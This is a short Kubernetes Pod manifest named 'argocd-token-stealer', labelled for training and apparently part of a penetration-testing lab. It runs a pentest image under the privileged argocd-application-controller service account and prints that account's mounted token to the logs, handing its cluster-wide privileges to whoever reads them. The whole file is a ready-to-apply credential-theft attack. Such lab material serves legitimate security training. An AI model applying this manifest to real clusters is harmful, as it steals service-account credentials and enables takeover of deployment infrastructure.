apiVersion: v1
kind: Pod
metadata:
  name: argocd-token-stealer
  namespace: argocd
  labels:
    training: k8s
spec:
  serviceAccountName: argocd-application-controller
  automountServiceAccountToken: true
  containers:
  - name: container
    image: cloudsecconsult/pentest:main-1.0.0-root-2026-04-01-0343
    command: ["/bin/bash", "-c", "--", "cat /run/secrets/kubernetes.io/serviceaccount/token; sleep inf"]